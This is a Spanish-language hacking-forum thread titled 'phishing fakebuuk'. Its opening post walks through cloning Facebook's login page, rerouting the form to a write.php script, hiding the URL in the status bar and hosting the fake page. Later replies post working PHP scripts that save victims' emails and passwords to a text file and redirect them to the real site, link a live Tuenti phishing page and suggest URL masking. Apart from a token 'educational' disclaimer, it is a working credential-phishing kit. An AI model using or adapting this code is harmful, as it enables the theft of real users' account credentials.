elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  phishing fakebuuk
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: phishing fakebuuk  (Leído 13,109 veces)
p1r4t0s

Desconectado Desconectado

Mensajes: 76


i saw, inside of the code...


Ver Perfil WWW
phishing fakebuuk
« en: 8 Febrero 2011, 04:42 am »

Bueno este es un ejemplo de phishing
.
.
.
Todo lo que viene a continuación esta hecho con fines educativos y el autor no se hace responsable por el mal uso que se hicieren de este material... :xD

Cosas que vamos a necesitar:  :P

     +Conocimietos basicos de html y php 
     +Archivo index.htm con la fake page
     +Archivo write.php con el script capture pass
     +Archivo pass.txt donde se guardaran las pass
    
Paso1.-
Abrimos con el firefox la página objetivo, en este caso el www dot f a c e b o o k dot com

Paso2.-
Abrimos el source code, copiamos todo en un notepad y lo guardamos con el nombre y extención: index.htm

3.-Buscamos los campos el formulario donde se pone el user y pass.
Código:
<form method=GET action=write.php id="https://login.facebook.com/login.php?login_attempt=1" id="login_form" id=" Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="nu3-U" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_LA" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Dirección de correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u010237_3"><input value="Entrar" tabindex="4" type="submit" id="u010237_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">No cerrar sesión</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">¿Has olvidado tu contraseña?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="nu3-U" autocomplete="off" /></form>


4.- Editamos donde empieza el form y cambiamos:
Código:
<form method=GET action=write.php
...esto hace que el form ejecute a write.php con la función GET

5.- Editamos en el boton imput entrar:
Código:
<input value="Entrar" onmouseover="window.status='www.facebook.com';return true" onmouseout="window.status='';return true" tabindex="4" type="submit" id="u010237_3" />
... para que no se vea la url en la barra de estado...

no pongo todo el code pq es muuuy largo :xD


6.- buscamos un hosting gratis ó en alguno que tengamos corriendo nuestra shell y los subimos (este ejemplo: esta testeado en m i a r r o b a)

7.-En nuestro host creamos el archivo pass.txt (donde se guardaran las contraseñas)

8.-Ahora tenemos hecho el 50% del trabajo,  toca hacer el fakemail, launcher ó xploit. Aunque un poco de ing. social funciona.
  
Nota.- No necesariamente tiene que ser en un txt donde guardes los passwords ya que puedes mandarlo a un correo, celular ó guardar los datos a una base de datos.  Como ven no tiene mucha ciencia los cripts en si.

Ahhh y tampoco garantiza el 100% de efectividad por ejemplo si la victima ve la URL: xD ya fue..... te pillaron xDDDD


Si bien hay mejores versiones de phishing a fb, esta es la mía y esta en español :D
y solo quería comprobar lo que se puede hacer :)




En línea



taskkill religion.exe, politica.exe, dinero.exe  = no more wars  ;D  the way it's  meant to be played...
JuszR


Desconectado Desconectado

Mensajes: 2.866


Programming & RI


Ver Perfil
Re: phishing fakebuuk
« Respuesta #1 en: 9 Febrero 2011, 00:01 am »

Una especia de xploit, o me equivoco ?
En línea

- No programming language is perfect. There is not even a single best language; there are only languages well suited or perhaps poorly suited for particular purposes. [Herbert Mayer]
p1r4t0s

Desconectado Desconectado

Mensajes: 76


i saw, inside of the code...


Ver Perfil WWW
Re: phishing fakebuuk
« Respuesta #2 en: 21 Febrero 2011, 04:03 am »

Hola JuszR,  un xploit seria el mail seria el fake mail y este es una fake page.

Citar
XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.

Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

PHISHING
Ver en wiki

Espero que la explicación resuelva tus dudas  :D
En línea



taskkill religion.exe, politica.exe, dinero.exe  = no more wars  ;D  the way it's  meant to be played...
johndogget

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: phishing fakebuuk
« Respuesta #3 en: 12 Febrero 2012, 22:38 pm »

hola soy nuevo y con poca experiencia y sobre todo conocimientos. como armas el fake mail para que sea igual a los que manda fezebuuk? gracias
En línea

Bl1ttCeR

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: phishing fakebuuk
« Respuesta #4 en: 12 Mayo 2012, 17:21 pm »

y donde esta el write.php del script capture pass, porque pusiste lo más sencillo que no tiene mayor complicación el script es lo importante creo yo. -.-)
« Última modificación: 12 Mayo 2012, 17:27 pm por Bl1ttCeR » En línea

QX6700, SHAPPIRE X1950XTX CF, CHELLSHOCKS DDR8000 CL5 MICROM D9 2x1GB, WD RAPTOR 150GB
Runex

Desconectado Desconectado

Mensajes: 192


http://tutogramacion.blogspot.com


Ver Perfil WWW
Re: phishing fakebuuk
« Respuesta #5 en: 12 Mayo 2012, 17:46 pm »

p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:

http://zonacx.webs.com/tuenti.html

Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? :).

Un saludo
En línea

"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".
Runex

Desconectado Desconectado

Mensajes: 192


http://tutogramacion.blogspot.com


Ver Perfil WWW
Re: phishing fakebuuk
« Respuesta #6 en: 12 Mayo 2012, 18:03 pm »

p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:

http://zonacx.webs.com/tuenti.html

Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? :).

Aviso, no pongáis ningún dato en el formulario que se copian en un txt y solo lo hice como prueba, no quiero lios con compañeros :)

Un saludo :)
En línea

"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".
Bl1ttCeR

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: phishing fakebuuk
« Respuesta #7 en: 12 Mayo 2012, 18:14 pm »

Aquí os dejo una idea de write.php  ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime.

Actualizo con un header fácilmente se le redirigiría, por cierto me he dado cuenta que después de sacar la web con Chrome por lo menos se me queda más pequeña que la real ajaajajaa se nota la diferencia, por otra parte lo de pasar los imputs a la real y hacer el submit es más complejo me da...


Código:
<?php
$email="";
if (!empty($_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty($_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a");
fwrite($file,$email.$pass);  

header('Location: http://www.facebook.com');

?>
« Última modificación: 12 Mayo 2012, 18:20 pm por Bl1ttCeR » En línea

QX6700, SHAPPIRE X1950XTX CF, CHELLSHOCKS DDR8000 CL5 MICROM D9 2x1GB, WD RAPTOR 150GB
Runex

Desconectado Desconectado

Mensajes: 192


http://tutogramacion.blogspot.com


Ver Perfil WWW
Re: phishing fakebuuk
« Respuesta #8 en: 12 Mayo 2012, 18:19 pm »

Aquí os dejo una idea de write.php  ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime


Código:
<?php
$email="";
if (!empty($_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty($_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a");
fwrite($file,$email.$pass);  

?>

Yo he usado éste para tuenti:

Código
  1. <?php
  2. $email = $_POST["email"];
  3. $password = $_POST["input_password"];
  4. $archivo = fopen("cuentas.txt","a");
  5. fwrite($archivo,"Email: ".$email."   Password: ".$password);
  6. fclose($archivo);
  7. ?>

Tampoco hay que calentarse mucho la cabeza xD. Eso que dices para loguearse, voy a ponerme ahora con ello pero simplemente hay que añadir un header como has hecho tú :)

Un saludo :)
« Última modificación: 12 Mayo 2012, 18:25 pm por Runex » En línea

"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".
Bl1ttCeR

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: phishing fakebuuk
« Respuesta #9 en: 12 Mayo 2012, 18:23 pm »

Y si enmascaras el localhost con la url de la original... si tienes acceso a la maquina claro está para ello, aunque está más difícil sin acceso, lo digo por el tema de la url diferente.


PD: este post tiene casi 2700visitas y nadie ha dicho nada...
« Última modificación: 12 Mayo 2012, 19:33 pm por Bl1ttCeR » En línea

QX6700, SHAPPIRE X1950XTX CF, CHELLSHOCKS DDR8000 CL5 MICROM D9 2x1GB, WD RAPTOR 150GB
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Phishing en tuenti « 1 2 3 »
Bugs y Exploits
dani__ 24 18,938 Último mensaje 30 Agosto 2010, 17:39 pm
por Caselles
[Ruby] Phishing Gen
Scripting
BigBear 0 1,788 Último mensaje 7 Octubre 2011, 01:31 am
por BigBear
Intento de Phishing
Seguridad
Pablo Videla 6 4,760 Último mensaje 8 Mayo 2012, 17:29 pm
por Saberuneko
phishing
Dudas Generales
zentinela 0 1,789 Último mensaje 25 Agosto 2020, 03:40 am
por zentinela
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines